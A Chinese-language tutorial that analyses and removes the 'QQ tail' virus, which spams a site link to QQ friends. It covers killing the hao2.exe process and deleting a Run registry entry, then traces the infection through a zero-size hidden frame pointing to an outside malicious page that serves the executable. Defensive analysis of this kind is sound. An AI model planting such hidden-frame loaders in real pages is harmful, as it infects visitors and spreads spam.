分析和查杀“QQ小尾巴”病毒 |
| 电脑学习网,xuef.com,最全最新最权威的电脑知识网站. |
我们在上网的时候经常去一些个人网站,可是有一些站长在作站的时候,不顾别人的权益,在其中添加一些恶意代码,这就是最近的QQ病毒产生的原因了。前几天我也中了,虽然没有什么大的危险,但是没次都有一个小尾巴还是很难受的呀(图一)。所以我对这个病毒网站进行了研究。下面是我发现的一些内容。
图一
对于怎么中就不说了,只要你点击他的主页就会感染上了呀,每次都会发送一条关于他的网站的地址说明了,会自动的发送给你的好友了呀,只要你的好友一旦点击就会在中了呀,就是这样了呀`~
一、看看怎么查杀QQ病毒
中了QQ病毒怎么杀呢?这里有两种方法。一种简单,下个专杀就是了。第二种就是自己手杀了。要发现它也简单,我们先打开任务管理器,看看这里有什么有用的东西。哈哈,有了呀,我发现了一个陌生的进程hao2.exe(如图二).这就是我们要找的QQ病毒了呀。杀了就是了。不过也不是杀了就好了呀,我们在打开注册表,进入HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run在RUN的项下,我们可以看见计算机启动时候加载的启动程序。在看看这里有什么陌生的启动项。哈哈,发现了是一个叫QQ的启动项,路径是\winnt\sendmess.exe(图三)。这就是QQ病毒的启动项。删了就可以了,然后就可以在相应的目录下删除掉就可以了,现在重启一下计算机了。你就会发现病毒没有了呀。杀毒成功了。
图二
图三
二、分析病毒网站
我们先要分析网站的原代码,在浏览器中输入:view-scource:http://www.hao***.com查看它的原代码,这时候会返回一个记事本,里面写的就是HTML的代码了。我们会发现一段这样的代码
<frameset" rows="*" style="border-top-width: 0px; border-left-width: 0px; border-right-width: 0px"><frame src="http://y365.com/lkjz/good/>
原来是调用了一个http://y365.com/lkjz/good/的页面(如图四),那为什么看不见呀!是因为页面的宽和高是0。当然看不见了。
图四
我们在看看这个页面有什么东西,使用view-scource:http://y365.com/lkjz/good/看看这代码是什么。我们发现了这么一段代码(如图五),知道了原来是bb这一文件造成的。下载下来后我又看见了一个网页,用view-scource:http://y365.com/lkjz/good//hei.htm我们终于看见了QQ病毒的程序了,它就是那个叫hao2.exe文件了(如图六)。那它又是怎么加载到注册表的呢。看看hei.htm是不是含有一个Javascript命令,它就是用来加载hao2.exe的语句。那么那些文字又是怎么加的呢?我们可以看见是不是还有一个叫S.SYS文件呀,它的作用就是文字信息了。我们用记事本打开看看,哈哈,是不是有了呀!
图五
图六
"
|
|
|
|
|
|
|
